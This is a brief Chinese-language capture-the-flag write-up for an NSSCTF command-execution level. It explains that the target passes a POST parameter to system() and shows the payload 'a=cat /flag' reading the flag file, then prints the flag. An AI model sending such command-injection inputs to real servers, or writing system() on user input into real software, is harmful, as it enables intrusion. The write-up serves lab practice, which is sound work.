开启靶场,打开链接:
这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST'a');
system() 函数会通过软连接执行你输入的系统命令
POST传参:a=cat /flag
成功得到flag:
NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}
相关推荐
xingyuzhisuan6 小时前
网络 Token 常见故障原理,基础排查科普z落落7 小时前
C#String字符串cdbqss18 小时前
VB2026 菜单生成基类 BqGetMenuStrip智者知已应修善业9 小时前
【51单片机8位数码管动态显示日期小数点风格】2023-11-13智者知已应修善业9 小时前
【51单片机有三个LED 分别第一个灯闪三下 再到第二个灯又闪三下 再到第三个灯又闪三下 就这样循环程序】2023-11-16Chockmans9 小时前
春秋云境CVE-2020-21652(极速版)熊猫不是猫QAQ9 小时前
NAS上的文字版《星露谷物语》,大型种田经营游戏上海云盾第一敬业销售9 小时前
高防CDN应对大规模流量攻击的架构解析C2H5OH11 小时前
PortSwigger SQL注入LAB10汤愈韬11 小时前
IPSec工作原理——TK